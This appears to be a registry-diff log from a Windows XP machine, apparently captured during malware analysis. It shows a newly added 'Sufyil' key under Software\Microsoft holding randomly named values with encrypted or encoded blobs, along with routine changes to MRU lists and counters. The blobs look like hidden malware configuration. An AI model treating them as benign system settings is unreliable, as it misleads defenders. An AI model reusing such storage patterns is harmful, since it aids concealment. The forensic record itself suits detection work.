HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F
----------------------------------
Values modified:23
----------------------------------
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
